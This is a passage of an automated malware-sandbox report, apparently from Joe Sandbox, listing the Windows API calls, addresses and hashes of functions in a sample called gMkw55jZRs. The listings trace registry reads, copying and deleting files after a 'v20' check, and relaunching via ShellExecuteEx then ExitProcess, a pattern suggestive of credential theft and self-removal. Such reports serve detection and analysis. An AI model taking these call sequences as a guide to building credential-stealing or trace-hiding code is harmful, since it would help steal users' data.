                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00927920), ref: 009279C2
                                      • RegQueryValueExA.ADVAPI32(00927920,00420AAC,00000000,00000000,?,000000FF), ref: 009279E1
                                      • RegCloseKey.ADVAPI32(00927920), ref: 009279EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: 2c110d70c589e9961c956f350db04882b009e32f4b2be6eb86b75843ef72b907
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: FD0144BDA40308BFEB10DFE0DC4AFAEB7B9EB44701F104159FA05A7280D67555008F51
                                      APIs
                                      • StrStrA.SHLWAPI(009DAC88,?,?,?,0041140C,?,009DAC88,00000000), ref: 0041926C
                                      • lstrcpyn.KERNEL32(0064AB88,009DAC88,009DAC88,?,0041140C,?,009DAC88), ref: 00419290
                                      • lstrlenA.KERNEL32(?,?,0041140C,?,009DAC88), ref: 004192A7
                                      • wsprintfA.USER32 ref: 004192C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0091151B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00911522
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0091153E
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0091155C
                                      • RegCloseKey.ADVAPI32(?), ref: 00911566
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: 66fcc0d0b006b66f5f3d6b84cca9abb6f86a9c32d8809775e29d7b080274c8a6
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: 870131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                      • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                      APIs
                                      • __getptd.LIBCMT ref: 0092C9B5
                                        • Part of subcall function 0092C206: __getptd_noexit.LIBCMT ref: 0092C209
                                        • Part of subcall function 0092C206: __amsg_exit.LIBCMT ref: 0092C216
                                      • __getptd.LIBCMT ref: 0092C9CC
                                      • __amsg_exit.LIBCMT ref: 0092C9DA
                                      • __lock.LIBCMT ref: 0092C9EA
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0092C9FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                      • Instruction ID: df71175fb790ec2401ae7add32368cf5117e281f99432ae12b9d45c35d0fa3e9
                                      • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                      • Instruction Fuzzy Hash: 03F0B472A40734DBDB30BBA8780371D33E0AF90764F20410AF824A71DADF645980DB9E
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C74E
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __getptd.LIBCMT ref: 0041C765
                                      • __amsg_exit.LIBCMT ref: 0041C773
                                      • __lock.LIBCMT ref: 0041C783
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                      • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                      • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                      • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,009A9800), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,009A9780), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,009A9750), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      • Opcode ID: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                      • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                      • Opcode Fuzzy Hash: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                      • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,009A9800), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,009A9780), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,009A9750), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      • Opcode ID: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                      • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                      • Opcode Fuzzy Hash: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                      • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 009268CA
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0092698D
                                      • ExitProcess.KERNEL32 ref: 009269BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                      • Instruction ID: e7db8bd0258236870937bc5119fc82ed2ecb2fb0f8cca5dde59d766f180c5eac
                                      • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                      • Instruction Fuzzy Hash: E03180B2801228EBDB14EF90ED96FEEB779AF54300F404198F20562195DF746B88CF5A
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                      • ExitProcess.KERNEL32 ref: 00416755
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                      • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                      • Opcode Fuzzy Hash: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                      • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: @Jn@$Jn@$Jn@
                                      • API String ID: 544645111-1180188686
                                      • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                      • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                      • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                      • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                      APIs
                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrcpy
                                      • String ID: vI@$vI@
                                      • API String ID: 3905823039-1245421781
                                      • Opcode ID: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                      • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                      • Opcode Fuzzy Hash: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                      • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                      • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                      • wsprintfW.USER32 ref: 00418D78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 659108358-2783943728
                                      • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                      • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                      • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                      • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 00928DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00911660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00928DED
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091A548
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0091A666
                                      • lstrlen.KERNEL32(00000000), ref: 0091A923
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 0091A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0091A094
                                      • DeleteFileA.KERNEL32(00000000), ref: 0091A9AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                      • Instruction ID: ec7d20c2e8b487a77b03e8264e1253d6a74d0355027b48040ffbc3f1d6c8f205
                                      • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                      • Instruction Fuzzy Hash: 44E1D177910128DBCB05EBA4ED92EEE7339AFA4700F508159F156B2095EF346B48CF62
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,009D6878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                      • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                      • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                      • Opcode Fuzzy Hash: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                      • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 00928DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00911660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00928DED
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D6E8
                                      • lstrlen.KERNEL32(00000000), ref: 0091D8FF
                                      • lstrlen.KERNEL32(00000000), ref: 0091D913
                                      • DeleteFileA.KERNEL32(00000000), ref: 0091D992
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                      • Instruction ID: 56b0a174681e8387a4bbc0fbc8a3117326dc478e6de5510b4cf317c85823f059
                                      • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                      • Instruction Fuzzy Hash: EF91EE77910128DBCF08FBA4ED96EEE7339AF94700F504169F14662096EF346A48CF62
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,009D6878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
